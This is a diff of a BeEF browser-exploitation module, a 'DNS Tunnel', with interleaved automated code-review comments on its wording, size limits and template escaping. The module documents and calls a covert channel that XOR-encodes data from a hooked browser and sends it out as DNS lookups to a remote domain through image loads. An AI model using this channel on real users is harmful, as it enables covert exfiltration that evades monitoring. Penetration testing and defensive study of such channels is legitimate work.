@@ -14,16 +14,16 @@
// limitations under the License.
//
/*
Poor man's omni-directional DNS tunnel in JavaScript.
Poor man's unidirectional DNS tunnel in JavaScript.
The largely-untested, highly experimental first draft.
How it works:
A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information.
A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The queries are sent in sequence however there are plans to randomize the order.
A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The segments are sent in sequence however there are plans to randomize the order.
To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the query is structured as follows:
To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the DNS query is structured as follows:
MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN
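Review bot: the layout line `MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN` and the sentence before it should say whether the 230-byte segment size is measured before or after URL encoding and the "%" to "." substitution, because every escaped byte becomes a three-character `.XX` fragment and the finished name, including the id, sequence, total, key and remote-domain labels, still has to fit the 255-character limit this same comment documents a few lines further down. It would also help to state what happens when the XOR'd output already contains a "." (or any other character the URL encoder leaves unescaped), since that would insert or split a label before the receiver can parse the layout above. The wording fixes in this hunk (omni-directional to unidirectional, queries to segments, query to DNS query) are correct; unidirectional is what the module actually does.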
@@ -37,15 +37,10 @@ o Domain names are limited to 255 characters in length (including dots)
o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
o Subdomains are limited to 63 characters in length (including the trailing dot)
Each query is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
Features:
o Does not use DNS pre-fetching - The downside is that the requests will take a while to timeout unless the DNS server is configured to reply with NXDOMAIN (ie, blackholed) for all requests.
o Encryption - Uses very weak "encryption" (XOR) and the key is transferred with the request.
o Randomization - Each segment is given a sequence id. TODO: Send segments in a random order.
Each segment is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
Caveats:
o Omni-directional - Data can only be sent one way.
o Unidirectional - Data can only be sent one way.
o Message size - Limited to messages less than 64KB in length.
o Limited by JavaScript strings. Byte code needs to be converted to a compatible string before it can be sent. There's also lots of wasted space. Converting to hex would be much cleaner and would save a few bytes for each query.
o Throttling - There is no throttling. The browser may only initiate x amount of simultaneous connections. The requests should be throttled to avoid hitting the cap. TODO: Introduce a wait delay between each request to partially account for this.
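Review bot: deleting the whole "Features:" block drops two warnings that the rest of the file still depends on, and neither reappears under "Caveats:": that the XOR "encryption" is very weak and the key is transferred with the request (the query layout in the previous hunk still carries XOR_KEY in every name), and that without DNS pre-fetching the image requests take a while to time out unless the DNS server answers NXDOMAIN for everything. Suggest moving both under "Caveats:" rather than removing them, e.g. `o Encryption - XOR only, with the key sent in the query itself; this is obfuscation, not confidentiality.` and `o Timeouts - Requests hang until the image load fails unless the server replies NXDOMAIN.` The "o Randomization" bullet can go, since its content is already covered by the sequence-number sentence and the TODO. Separately, the unchanged line "Subdomains are limited to 63 characters in length (including the trailing dot)" conflicts with the line above it, which already counts the dots against the 255-character name limit; counting the dot a second time in the per-label limit looks like a double count, so please confirm the label limit against RFC 1035 and reword it.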
@@ -64,7 +59,7 @@ beef.execute(function() {
var domain = "<%= @domain %>";
var message = "<%= @message %>";
beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num) } );
beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num+' requests sent') } );
});
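Review bot: appending `' requests sent'` to the `dns_requests=` value turns a numeric field into free text, so anything on the BeEF side that parses `dns_requests` as an integer or compares it numerically will break; keep `'dns_requests='+num` and add the wording in the result display, or send the phrase as a separate key. Separately, the unchanged lines `var domain = "<%= @domain %>";` and `var message = "<%= @message %>";` interpolate operator-supplied input directly into JavaScript string literals, so a message containing `"`, `\` or a newline breaks the script (and a domain is just as exposed); escape or JSON-encode both values in the template before they are embedded.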
@@ -19,7 +19,7 @@ beef:
enable: true
category: "IPEC"
name: "DNS Tunnel"
description: "Sends data over DNS to a server which accepts wildcard subdomains."
description: "This module sends data one way over DNS.<br/><br/>A domain and message are taken as input. The message is XOR'd, url encoded, the '%' are replaced with '.' and the message is split into segments of 230 bytes. The segments are sent in sequence along with the sequence number and XOR key.<br/><br/>Note: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information."
authors: ["bcoles"]
target:
working: "All"
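Review bot: the new `description:` repeats the "How it works" text from the module header almost verbatim (XOR, url encoding, "%" to ".", 230-byte segments, the wildcard-subdomain note), so the two will drift the next time either is edited; keep the config description to a short summary and point operators at the module source for the format. It is also already slightly out of step with the header: it says each segment is sent "along with the sequence number and XOR key" but leaves out the message id and total-segment count that the documented query layout carries, which is exactly what a receiver needs to reassemble the message. If the long form stays, please add those two fields to the sentence, and consider making the weak-XOR warning explicit here as well, since the description is what the operator sees in the UI.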